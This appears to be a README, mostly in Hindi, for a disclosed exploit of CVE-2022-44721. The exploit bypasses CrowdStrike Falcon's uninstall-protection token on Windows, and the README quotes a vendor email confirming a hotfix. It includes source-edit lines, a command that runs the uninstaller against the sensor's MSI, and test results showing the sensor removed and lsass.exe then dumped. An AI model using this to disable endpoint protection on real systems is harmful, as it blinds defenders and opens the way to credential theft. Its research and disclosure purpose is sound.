
CVE-2022-44721 के लिए शोषण जो विंडोज पर CrowdStrike Falcon अनइंस्टॉल सुरक्षा टोकन जांच को बायपास करता है, जिससे व्यवस्थापक विशेषाधिकारों वाले हमलावरों को EDR/AV सेंसर को हटाने की अनुमति मिलती है।
CrowdStrike Falcon एक क्लाउड-संचालित एंडपॉइंट डिटेक्शन और रिस्पॉन्स (EDR) और एंटीवायरस (AV) समाधान है। प्रत्येक अंत-डिवाइस पर एक कर्नेल स्तर का प्रबंधित सेंसर तैनात होता है और क्लाउड-आधारित क्षमताओं का उपयोग करता है। सेंसर को एक अनइंस्टॉल सुरक्षा के साथ कॉन्फ़िगर किया जा सकता है। यह एक बार उत्पन्न टोकन के बिना अंत-डिवाइस पर CrowdStrike Falcon सेंसर को अनइंस्टॉल करने से रोकता है।
इस कमजोरी का शोषण करने से एक हमलावर प्रशासनिक विशेषाधिकारों के साथ विंडोज अंत-डिवाइसों पर टोकन जांच को बायपास कर सकता है और बिना उचित प्राधिकरण के डिवाइस से सेंसर को अनइंस्टॉल कर सकता है, जिससे प्रभावी रूप से डिवाइस की EDR और AV सुरक्षा हटा दी जाती है।
Vulnerable sensor version: 6.44.15806
Crowdstrike समर्थन टीम की स्वीकृति ईमेल का स्निप
...
As the referenced CVE was not released in coordination with CrowdStrike, it may be missing some details, however our customers
have been kept up to date on our remediation efforts and the affected sensor versions, including a release of the hotfix for v6.44.15806.
Please see the relevant tech alerts explaining the nature of this issue and the fix releases at
https://supportportal.crowdstrike.com/s/article/Tech-Alert-Uninstall-Protection-Bug-in-Falcon-Sensor-for-Windows
Therefore, I believe you can go ahead and publish the CVE adding the impacted Sensor versions
we were able to test and confirm they are affected.
...
जैसा कि ईमेल में कहा गया है, Crowdstrike ने पहले ही कमजोर संस्करणों को पैच कर दिया था।
# edit #1
Line 111: std::string cmd = "cmd /c start msiexec /x " + guid;
# edit #2
Line 67: if (g_msiexec_instance_count == 3 || g_msiexec_instance_count == 5) {
.\Falcon-6.44.15806-uninstall.exe "C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.44.15806\CsAgent.msi"
परीक्षण मशीन का नाम: MOANA
नीतियाँ: EXTRA AGGRESSIVE (सभी विकल्प सक्षम)

अनइंस्टॉल प्रगति पर है...

अनइंस्टॉल पूरा हुआ (Crowdstrike निर्देशिका के अंदर कोई और फ़ाइल नहीं है) - यदि डेमॉन मेमोरी में सक्रिय और चल रहा है तो पुनरारंभ आवश्यक है (यह डिटेक्शन उत्पन्न करेगा)

Moana परिणाम क्लाउड के माध्यम से अप्राप्य

lsass.exe का डंप

Fortunato [fox] Lodari, Raffaele Nacca, Walter Oberacher, Davide Bianchin, Luca Bernardi @ डेडा क्लाउड साइबर सुरक्षा टीम